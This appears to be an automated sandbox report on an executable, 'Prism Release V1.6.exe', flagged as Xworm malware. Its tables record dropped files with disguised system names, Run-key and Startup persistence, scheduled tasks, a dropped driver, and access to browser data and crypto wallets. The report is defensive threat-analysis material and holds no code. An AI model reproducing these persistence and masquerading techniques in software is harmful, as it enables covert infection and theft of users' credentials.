Analysis Overview
SHA256
cee9d4132e0c5f98b5d84099c9f4a080b35e436174be8e5a59df1e8c7cae8fbd
Threat Level: Known bad
The file Prism Release V1.6.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Drops startup file
Looks up external IP address via web service
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: AddClipboardFormatListener
Modifies system certificate store
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Modifies registry class
Enumerates system info in registry
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 09:08
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 09:08
Reported
2024-06-15 09:18
Platform
win10v2004-20240611-en
Max time kernel
445s
Max time network
462s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\nldrv.sys | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\intel graphics processor.exe | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Prism.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetLimiter = "\"C:\\Program Files\\Locktime Software\\NetLimiter\\nlclientapp.exe\" /minimized" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | N/A | N/A |
| File opened (read-only) | \??\T: | N/A | N/A |
| File opened (read-only) | \??\M: | N/A | N/A |
| File opened (read-only) | \??\R: | N/A | N/A |
| File opened (read-only) | \??\W: | N/A | N/A |
| File opened (read-only) | \??\X: | N/A | N/A |
| File opened (read-only) | \??\P: | N/A | N/A |
| File opened (read-only) | \??\J: | N/A | N/A |
| File opened (read-only) | \??\S: | N/A | N/A |
| File opened (read-only) | \??\V: | N/A | N/A |
| File opened (read-only) | \??\N: | N/A | N/A |
| File opened (read-only) | \??\S: | N/A | N/A |
| File opened (read-only) | \??\Z: | N/A | N/A |
| File opened (read-only) | \??\O: | N/A | N/A |
| File opened (read-only) | \??\T: | N/A | N/A |
| File opened (read-only) | \??\K: | N/A | N/A |
| File opened (read-only) | \??\J: | N/A | N/A |
| File opened (read-only) | \??\Z: | N/A | N/A |
| File opened (read-only) | \??\G: | N/A | N/A |
| File opened (read-only) | \??\O: | N/A | N/A |
| File opened (read-only) | \??\U: | N/A | N/A |
| File opened (read-only) | \??\E: | N/A | N/A |
| File opened (read-only) | \??\R: | N/A | N/A |
| File opened (read-only) | \??\T: | N/A | N/A |
| File opened (read-only) | \??\E: | N/A | N/A |
| File opened (read-only) | \??\L: | N/A | N/A |
| File opened (read-only) | \??\Q: | N/A | N/A |
| File opened (read-only) | \??\M: | N/A | N/A |
| File opened (read-only) | \??\Y: | N/A | N/A |
| File opened (read-only) | \??\A: | N/A | N/A |
| File opened (read-only) | \??\H: | N/A | N/A |
| File opened (read-only) | \??\N: | N/A | N/A |
| File opened (read-only) | \??\X: | N/A | N/A |
| File opened (read-only) | \??\V: | N/A | N/A |
| File opened (read-only) | \??\Y: | N/A | N/A |
| File opened (read-only) | \??\L: | N/A | N/A |
| File opened (read-only) | \??\B: | N/A | N/A |
| File opened (read-only) | \??\Q: | N/A | N/A |
| File opened (read-only) | \??\E: | N/A | N/A |
| File opened (read-only) | \??\I: | N/A | N/A |
| File opened (read-only) | \??\K: | N/A | N/A |
| File opened (read-only) | \??\X: | N/A | N/A |
| File opened (read-only) | \??\L: | N/A | N/A |
| File opened (read-only) | \??\P: | N/A | N/A |
| File opened (read-only) | \??\M: | N/A | N/A |
| File opened (read-only) | \??\Z: | N/A | N/A |
| File opened (read-only) | \??\S: | N/A | N/A |
| File opened (read-only) | \??\W: | N/A | N/A |
| File opened (read-only) | \??\U: | N/A | N/A |
| File opened (read-only) | \??\B: | N/A | N/A |
| File opened (read-only) | \??\H: | N/A | N/A |
| File opened (read-only) | \??\O: | N/A | N/A |
| File opened (read-only) | \??\B: | N/A | N/A |
| File opened (read-only) | \??\J: | N/A | N/A |
| File opened (read-only) | \??\R: | N/A | N/A |
| File opened (read-only) | \??\Y: | N/A | N/A |
| File opened (read-only) | \??\G: | N/A | N/A |
| File opened (read-only) | \??\W: | N/A | N/A |
| File opened (read-only) | \??\G: | N/A | N/A |
| File opened (read-only) | \??\K: | N/A | N/A |
| File opened (read-only) | \??\Q: | N/A | N/A |
| File opened (read-only) | \??\U: | N/A | N/A |
| File opened (read-only) | \??\N: | N/A | N/A |
| File opened (read-only) | \??\V: | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.Sockets.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Buffers.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Microsoft.Extensions.DependencyInjection.Abstractions.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\pt-br\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ko\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Collections.NonGeneric.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.UnmanagedMemoryStream.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Algorithms.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.ThreadPool.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\hi\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.AppContext.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Debug.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.Pipes.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Linq.Queryable.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.CompilerServices.VisualC.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLInterop.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\FamFamFam.Flags.Wpf.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvcCliCnnCheck.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Linq.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Numerics.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Globalization.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.Security.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Resources.Reader.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Json.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Timer.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Xceed.Wpf.Toolkit.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Console.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.TraceSource.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Newtonsoft.Json.dll | N/A | N/A |
| File opened for modification | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NetLimiter.Runtime.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.FileSystem.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Reflection.Extensions.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Thread.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Claims.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\es\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Drawing.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.WebSockets.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.SecureString.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Microsoft.Win32.TaskScheduler.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Data.Common.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.ValueTuple.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.InteropServices.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ports.bin | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe.nlog | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.NameResolution.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Contracts.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Tasks.Parallel.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\CoreLibNet.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\tr\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\zh-hant\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\IPAddressRange.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Process.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Xml.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ScottPlot.WPF.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Numerics.Vectors.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Resources.Writer.dll | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5ce49b.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIED01.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE6F0.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE720.tmp | N/A | N/A |
| File created | C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe | N/A | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | N/A | N/A |
| File opened for modification | C:\Windows\Installer\ | N/A | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIED00.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIECD0.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF39A.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA33.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIEADA.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA54.tmp | N/A | N/A |
| File created | C:\Windows\Installer\e5ce49b.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE643.tmp | N/A | N/A |
| File created | C:\Windows\Installer\SourceHash{63BC5994-B37B-4416-A29E-B2D208BD5CAE} | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF34B.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA22.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE585.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE603.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIEBB5.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA23.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF716.tmp | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000043e29724379355490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000043e297240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090043e29724000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d43e29724000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000043e2972400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629162826089912" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
